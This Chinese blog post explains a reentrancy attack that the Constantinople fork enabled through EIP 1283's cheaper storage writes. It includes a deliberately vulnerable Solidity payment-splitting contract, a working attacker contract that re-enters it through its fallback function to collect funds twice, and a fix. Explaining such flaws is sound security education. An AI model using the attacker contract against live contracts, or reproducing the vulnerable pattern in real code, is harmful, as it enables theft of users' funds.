2. 程式人生 > >君士坦丁堡分叉引起的安全問題

君士坦丁堡分叉引起的安全問題

阿新 發佈:2019-01-19
信息處理 evm signature update 函數 solid 協商 anti mage

目錄

  • 君士坦丁堡分叉引起的安全問題
    • 一. 什麽是君士坦丁堡分叉
    • 二. 一個重入合約
    • 三. 一份嘗試攻擊的合約
    • 四. 組合調用
      • 分叉之前
      • 分叉之後
      • 調用順序
    • 五. 如何解決

君士坦丁堡分叉引起的安全問題

一. 什麽是君士坦丁堡分叉

君士坦丁堡是最近以太坊的大事,主要做了一下改進

  • EIP 145:由兩位以太坊開發人員Alex Beregszaszi 和 Pawel Bylica編寫的技術升級,EIP 145詳細描述了一種更有效的以太坊信息處理方案,其稱為逐位移動(bitwise shifting);
  • EIP 1052:由以太坊core開發人員Nick Johnson和Bylica所撰寫,1052提供了一種優化以太坊網絡大規模代碼執行的方法。
  • EIP 1283:由Johnson撰寫,其基於EIP 1087,這一提議主要了引入了一種針對數據存儲更改更公平的定價方法,這可以讓智能合約開發者受益。
  • EIP 1014:由以太坊創始人Vitalik Buterin親自創建,此升級的目的是更好地促進基於狀態通道和鏈外(off-chain)交易的擴容解決方案。
  • EIP 1234:由以太坊主要客戶端 Parity發布經理 Afri Schoedon所倡導,這也是以太坊此次升級中最具爭議的部分,它會使以太坊網絡的區塊獎勵從3ETH減少到2ETH,此外還會延遲難度炸彈12個月的時間。

其中EIP 1283 最重要的改動就是對於修改合約內容更加便宜了,原來修改非0內容的地址需要5000gas,現在只需要200gas.

具體意思就是

//第一次寫入
Contract.A=300 //花費20000gas
//第二次寫入
Contract.A=500 //花費5000gas,如果是君士坦丁堡分叉以後只有200gas.

這對於DAPP而言肯定是好事,降低了DAPP的成本.但是意外卻引入了安全風險.

二. 一個重入合約

一份雙方協調分成的合約,簡化起見,裏面很多安全問題沒檢查,比如updateSplit應該只能參與雙方更新.

//PaymentSharer.sol
pragma solidity ^0.5.0;

contract PaymentSharer {
  mapping(uint => uint) splits;
  mapping(uint => uint) deposits;
  mapping(uint => address payable) first;
  mapping(uint => address payable) second;

  function init(uint id, address payable _first, address payable _second) public {
    require(first[id] == address(0) && second[id] == address(0));
    require(first[id] == address(0) && second[id] == address(0));
    first[id] = _first;
    second[id] = _second;
  }

  function deposit(uint id) public payable {
    deposits[id] += msg.value;
  }

  function updateSplit(uint id, uint split) public {
    require(split <= 100);
    splits[id] = split;
  }

  function splitFunds(uint id) public {
    // Here would be: 
    // Signatures that both parties agree with this split

    // Split
    address payable a = first[id];
    address payable b = second[id];
    uint depo = deposits[id];
    deposits[id] = 0;
     
    a.transfer(depo * splits[id] / 100); //transfer 給2100 gas執行事務
    b.transfer(depo * (100 - splits[id]) / 100);
  }
}

雙方協商一致,調用updateSplit,定下各自應得多少比例.然後就可以調用splitFunds,分別拿走各自的ether.
這在君士坦丁堡分叉之前,是非常安全的.

三. 一份嘗試攻擊的合約

pragma solidity ^0.5.0;

import "./PaymentSharer.sol";

contract Attacker {
  address private victim;
  address payable owner;

  constructor() public {
    owner = msg.sender;
  }

  function attack(address a) external {
    victim = a;
    PaymentSharer x = PaymentSharer(a);
    x.updateSplit(0, 100);
    x.splitFunds(0);
  }

  function () payable external {
    PaymentSharer x = PaymentSharer(victim);
    x.updateSplit(0,0); //修改split,這樣下b.transfer就不再是transfer 0,達到雙倍收益.
  }
  //從合約中拿走全部ether
  function drain() external {
    owner.transfer(address(this).balance);
  }
}

四. 組合調用

    1. PaymentSharer.init(0,Attacker,anotherAddressOfAttacker)
    1. PaymentSharer.deposit(0) value=1ether
    1. Attacker.attack(PaymentSharer)

最關鍵的是第三步的調用順序:
attack-->updateSplit-->attack--->splitFunds(a全得,b沒有)--->a.transfer--->Attacker‘s fallback--->updateSplit(a沒有,b全得)-->b.transfer

最終a,b(Attacker和anotherAddressOfAttacker)各拿了一份完整的是後入,而不是預想的只有拿走全部.

分叉之前

合約中調用transfer函數的gas是固定的,只能是2300,無法改動. 而Attacker‘s fallback 函數中調用updateSplit, 其中 splits[id] = split;這一句話就會消耗5000gas,因此attack這個Tx會失敗.

分叉之後

splits[id] = split;只會消耗gas200,因此有足夠的gas來執行updateSplit, 所以a.transfer會成功,然後b.transfer自然也會成功.

調用順序

技術分享圖片

五. 如何解決

針對這個問題解決起來非常簡單.下面就是一種修正方法.

function splitFunds(uint id) public {
    // Here would be: 
    // Signatures that both parties agree with this split

    // Split
    address payable a = first[id];
    address payable b = second[id];
    uint depo = deposits[id];
    deposits[id] = 0;
    uint s=splits[id];
    a.transfer(depo * s / 100); //transfer 給2100 gas執行事務
    b.transfer(depo * (100 - s) / 100);
  }

這樣就算是Attacker有了重入的機會,可以執行代碼,也不會有任何額外收益. 應該說合約的設計者已經考慮到a.transfer的重入問題,先修改了deposits[id],而不是放在transfer之後,但是仍然百密一疏.

合約一旦發布就無法修改,但是EVM規則卻可以通過分叉修改,可以解決以後的問題,但是卻不能修復已經發布的合約.

本來參考了一下文章
Constantinople enables new Reentrancy Attack

君士坦丁堡分叉引起的安全問題

相關推薦

分叉引起安全問題

信息處理 evm signature update 函數 solid 協商 anti mage 目錄 君士坦丁堡分叉引起的安全問題 一. 什麽是君士坦丁堡分叉 二. 一個重入合約 三. 一份嘗試攻擊的合約 四. 組合調用 分叉之前 分叉之後 調用順序 五. 如何解決

金貓kinmall分析分叉對以太坊的影響

以太坊核心開發人員Péter Szilágyi表示,以太坊Rinkeby測試網已經成功升級到君士坦丁堡版本,目前網路狀態良好。在前兩週對於以太坊本次硬分叉升級分享了幾個觀點: 1、ETH硬分叉是為了實現從POW過度到POS機制; 2、ETH硬分叉不會產生新幣; 3、區塊鏈社群中的分歧是絕對的,共識是相對

可盈可樂研究院 | ETH分叉再次上演,暖風還是寒流?

12月7日,幣圈又出來一股硬分叉之風——以太坊ETH君士坦丁堡(Constantinople)分叉升級。一個月前才經歷過BCH硬分叉大戰,導致全線暴跌;ETH硬分叉緊隨其後,是暖風還是寒流,讓人很難判定。本文將探討如下幾個問題: 什麼是ETH君士坦丁堡分叉升級? 上次“拜占

京東區塊鏈聯合實驗室成立;升級被推遲至2019年初

     1.研究報告:南非是非洲對加密貨幣最友好的國家   根據諮詢和技術服務公司凱捷( Capgemini)與歐洲主要銀行巴黎銀行( BNP Paribas)聯合編制的《2018年世界支付報告》,南非是非洲對加密貨幣最友好的國家。與非洲大陸的其他主要經濟體相比,南非允許數字貨幣支付,有關

以太坊升級怎麼拿糖果?——AToken錢包小知識

年12月份,以太坊(Ethereum)開發團隊成員就君士坦丁堡硬分叉的啟用時間問題達成了一致意見,將以太坊區塊鏈7,080,000區塊作為啟用點讓使用者自行選擇升級程式碼。有以太坊支持者大致推算了啟用點的出塊時間,大約在今年的1月14~18日期間。那麼,現在以太坊君士坦丁堡就快來了! 說到

以太坊:是利好?-千氪

卻又 可能性 產生 tro ext 生態 信息處理 評價 ren      以太坊官方發文提醒硬分叉註意事項:分叉時間預計在1月16日,區塊高度在7080000。並強調,此次硬分叉就像Office軟件升級一樣,會出現一些兼容類的問題,節點需要全部更新升級。   此次更新是無

Oracle+PL+SQL從入門到精通.鋒.清華大學出版社.2012

for語句 11.2 第7章 mage delete 傳遞方式 erro map bulk \t第1篇 pl/sql開發入門第1章 oracle 11g數據庫系統1.1 關系型數據庫系統介紹1.1.1 什麽是關系型數據模型1.1.2 數據庫系統範式1.1.3 關系型數據庫

用Java,在這裡門簡單分為防盜門需要密碼、鑰匙;安全門需要密、鑰匙、虹膜。如果,不當進入會引起警報,警報有警車警報、煙霧警報,對要求寫程式碼

1建Door類 package Door; public abstract class Door { public abstract void open(); public abstract void close(); } 2、建The_police_car_a

由DateFormat引起的執行緒安全問題

有一次在測試環境中有個插入重複主鍵的問題,程式碼如下 @Transactional public void lending(OrderExtend order) { Date date = DateUtil.getCountyTime(); ........................

DELPHI 呼叫webservice一個安全問題引起的記憶體地址錯誤

突然感悟網路真的很強大,別人寫了東西為了我們解決了好多問題,真的非常感謝,你們經歷了太多的壓力才總結的東西,真是非常好。再此表示感謝,也是你們引領我寫上了部落格。讓知識永存。 資料執行保護例外設定: 1.右擊“我的電腦”。單擊“屬性”。 2.在“系統屬性”中單擊“高階”

一次HashMap多執行緒安全引起的事故

事故分析 最近一次web工程上線,上線大概半個小時,出現了報警,16核的伺服器的cpu使用了1123%,程式出異常了。 Cpu利用率過高一般是因為出現了出現了死迴圈,導致部分執行緒一直執行。佔用cpu時間。使用jstack工具dump出問題的那臺伺服器的棧資訊。死迴圈的話

ConcurrentHashMap實現線程安全的原理

訪問 數據 key 出現 擁有 操作 tab htable segment 在ConcurrentHashMap沒有出現以前,jdk使用hashtable來實現線程安全,但是hashtable是將整個hash表鎖住,所以效率很低下。 ConcurrentHashMap將數據

數據驅動安全架構升級---“花瓶”模型迎來V5.0(一)

安全模型 雲計算 花瓶 大數據 保障方案 數據驅動安全架構升級---“花瓶”模型迎來V5.0 Jackzhai 一、背景近十年,可以說是網絡技術大發展的十年,雲計算、大數據、移動互聯、物聯網等新技術逐漸成熟,社交、電商、智慧城市…現實社會正在全面走進網絡所構建的虛擬世界,網絡正在成為人們吃

數據安全的必由之路——數據安全治理

流程管理 安全防護 安全管理 數據安全 入侵者 引言:數據治理或者數據安全在大多數安全從業者的印象中是比較熟悉的概念,但數據安全治理似乎是個新名詞。實際上,對於擁有重要數據資產的各類企業,在數據安全治理方面或多或少都有實踐,只是尚未系統化的實行。比如客戶數據安全管理規範及其落地的配套管控措

跨域問題解決方式(HttpClient安全跨域 &amp; jsonp跨域)

str 輕量 mov fontsize 使用 col utf8 des conn 1 錯誤場景 今天要把項目部署到外網的時候,出現了這種問題, 我把兩個項目放到自己本機的

Android安全機制介紹

backup 可能 mbed 集合 應用程序 linux用戶 內存空間 bin 實施 Android的安全機制包含下面幾個方面: ? 進程沙箱隔離機制。 ? 應用程序簽名機制。 ? 權限聲明機制。 ? 訪問控制機

數據加密安全保護中出現的隱患點解析

文件加密 透明加密 文件加密軟件 隱私保護 數據加密 數據加密安全保護中出現的隱患點解析企業拿花費大量的人力物力和資源去投資數據加密安全保護,但是企業重要數據還是無形中遭到泄露流失。就算很多公司把安全防護修建的如堡壘要塞一樣了,一層又一層的墻壁環繞著網絡、軟件應用、存儲容器、ID和設備以及

小滿思索一

是你 並不是 問題 你會 事情 亦或 們的 自己 x問題   閑暇的午後出門走走,踩在用小石子鋪成的小道上。漫步在有些枯黃的草叢中,任憑陽光傾灑在身上,感覺整個身子變得更加的溫暖。偶爾吹來的風,稍許會帶來一絲涼意。在這裏最適合思考的不是生活瑣事,不是工作中的XX問題,是人生

趨勢科技安全威脅病毒預警(本周十大病毒排名)

tex 系統 重定向 運行程序 size white 感染病毒 活躍 lsp 最近,趨勢科技中國區網絡安全監控中心公布了《安全威脅每周警訊》,統計了較為活躍的排名前十的病毒類型。報告顯示,這些病毒共同的特征和逐利手段是:在用戶不知情的狀態下,私自下載惡意程序或未知

web安全之同源策略

rip 瀏覽器中 屬性。 名單 java get message 否則 cookie 為什麽使用同源策略?一個重要原因就是對cookie的保護,cookie 中存著sessionID 。如果已經登錄網站,同時又去了任意其他網站,該網站有惡意JS代碼。如果沒有同源策略,那麽這